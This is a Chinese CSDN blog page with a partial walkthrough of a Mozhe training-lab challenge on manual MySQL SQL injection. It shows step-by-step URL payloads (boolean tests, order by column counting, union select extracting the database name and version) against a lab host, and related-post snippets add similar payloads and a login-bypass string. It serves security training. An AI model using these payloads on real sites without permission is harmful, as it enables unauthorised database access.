墨者学院-SQL手工注入漏洞测试(MySQL数据库)

最新推荐文章于 2024-05-19 18:10:52 发布
最新推荐文章于 2024-05-19 18:10:52 发布
阅读量2.9k 收藏 10
点赞数 4
分类专栏: 笔记 文章标签: sql注入 手工sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43623470/article/details/86506985
版权
1,http://219.153.49.228:48730/new_list.php?id=1 and 1=1 不报错http://219.153.49.228:48730/new_list.php?id=1 and 1=2 报错,发现注入点2,http://219.153.49.228:48730/new_list.php?...
摘要由CSDN通过智能技术生成

在这里插入图片描述
1,http://219.153.49.228:48730/new_list.php?id=1 and 1=1 不报错
http://219.153.49.228:48730/new_list.php?id=1 and 1=2 报错,发现注入点
2,http://219.153.49.228:48730/new_list.php?id=1 order by 5
使用order by 查询 ,发现到5是报错,说明不大于5
3,http://219.153.49.228:48730/new_list.php?id=-1 union select 1,2,3,4
使用联合查询,返回在2和3
在这里插入图片描述
4,http://219.153.49.228:48730/new_list.php?id=-1 union select 1,database(),version(),4
查询数据库名称和版本
在这里插入图片描述

最低0.47元/天 解锁文章
[kb]
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
SQL手工注入+sqlmap工具测试漏洞测试(MySQL数据库)字符型注入
全村的希望
11-25 1238
SQL手工注入+sqlmap工具测试漏洞测试(MySQL数据库)字符型注入
墨者靶场SQL手工注入漏洞测试(MySQL数据库-字符型)
zyh1588的博客
11-01 191
小白回顾墨者靶场手工注入
墨者学院(POST注入
2301_77578012的博客
05-19 403
使用burpsuite抓包放在1.txt文件中,并且1.txt放在sqlmap工具。发现存在注入点,并且给出了我们具体执行的payload格式。(如果大家对工具有需求的话可以q我哈)参数后所跟数据也可以通过抓包获取。1.墨者靶场(POST注入)2.sqlmap工具(主要)3.burpsuite工具。,在需要测试参数后加。
WEB攻防-通用漏洞&SQL注入-sqlmap基本使用&墨者靶场
m0_65336233的博客
10-09 1646
WEB攻防-通用漏洞&SQL注入
SQLServer数据库注入-墨者学院(SQL手工注入漏洞测试(Sql Server数据库))
T1ngSh0w的博客
09-07 1240
SQLServer数据库注入-墨者学院-SQL手工注入漏洞测试(Sql Server数据库)详细讲解
墨者 - SQL手工注入漏洞测试(MySQL数据库)
吃肉唐僧的博客
07-02 712
/new_list.php?id=1 and 1=1,判断id的类型值是数字类型 /new_list.php?id=1 order by 4,测出数据库有4个字段,第5个不回显 测出页面回显位置 2和3 /new_list.php?id=1 and 1=2 union select 1,2,3,4 爆库 /new_list.php?id=1 and 1=2 uni...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
WebShell文件上传漏洞分析溯源
02-22
2. 渗透测试:通过渗透测试来检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描:使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。 六、WebShell 文件上传漏洞的实践案例 在这个实践案例中,我们使用...
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
SQL手工注入漏洞测试(MySQL数据库)
asd158923328的博客
08-20 1461
靶场地址: https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe 根据题意 进入页面 找到注入点 and 1=1 页面正常 and 1=2 页面报错 通过SQL语句中order by N 来判断有几个字段,返回内容正常,可以确定至少有1个字段。 通过SQL语句中order by N 来判...
墨者-SQL手工注入漏洞测试(Sql Server数据库) 题解
Redredredfish的博客
12-13 3054
靶场地址:https://www.mozhe.cn/bug/detail/SXlYMWZhSm15QzM1OGpyV21BR1p2QT09bW96aGUmozhe ①老样子url:http://219.153.49.228:49515/new_list.asp?id=2 判断id存在数字型注入 ②判断当前字段数 id=2 order by 4 正常 id=2 order by 5 报错 字段数为4 ③联合查询当前数据库 先用mysql的语法试一试 第一个坑: id = 2 union select 1,2,
墨者 - SQL手工注入漏洞测试(Sql Server数据库)
吃肉唐僧的博客
07-03 1873
/new_list.asp?id=2 and 1=2 ,返回页面没报错 /new_list.asp?id=2 order by 1 ,测试有多少个字段,知道order by 4还有页面回显 这里有个坑,一开始走正常的流程测回显位置 /new_list.asp?id=2 and 1=2 union select 1,2,3,4 , 用 union select 连...
墨者 - SQL手工注入漏洞测试(Db2数据库)
吃肉唐僧的博客
07-11 2733
进入环境,用order by测试,发现可以,并测试到字段为4 接下来用union select 1,2,3,4 发现失败 后来上网看了别人的思路是union select 1,2,3,4 from sysibm.systables就可以回显了 应该是不同的数据库语法问题 爆库 id=2 union select 1,2,current schema,4 from sysibm...
SQL手工注入漏洞测试(MySQL数据库-字符型)
qq_43590351的博客
01-30 880
字符型注入漏洞
墨者 - SQL注入漏洞测试(布尔盲注)
weixin_43803070的博客
07-08 1402
** 一、报数据库名字 ** 1.根据浮动的通告进度条,找到sql注入点。 内容不变,判断是数字型注入。 http://219.153.49.228:44199/new_list.php?id=1 and 1=1 --+ 2.然后开始判断数据库名字的长度,1,2,3…内容空白。一直试,试到长度为10 http://219.153.49.228:44199/new_list.php?id=1%...
墨者 - SQL注入漏洞测试(登录绕过)
吃肉唐僧的博客
07-10 1488
原理 服务端后台存在类似的代码 SELECT * FROM accounts WHERE username='admin' and password = 'password' 后端如果没做校验处理,username 和 password 值从前端传进来直接执行sql语句,就存在可以构造恶意代码。 如果在用户名框内输入"admin' AND 1=1 /*", 在密码框内输入任...
sql注入(2) 墨者学院之SQL手工注入漏洞测试MySQL数据库-字符型)
c10udz的博客
04-12 4116
这里我们可以看到版本是10.2.15,前面说过MySQL5.0版本以上有个自带的information_shema数据库,利用这个数据库可以查到整个数据库的结构,不然就只能盲猜了。//注释:(1)information_schema.tables表示information_schena这个数据库下的表,在MySQL中【.】代表下一级。利用'order by 任意数字 %23去判断,得到4(结尾加%23的原因:在一个语句结尾时,需要用#结尾,而#的url编码就是%23)table_schema:数据库名。
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值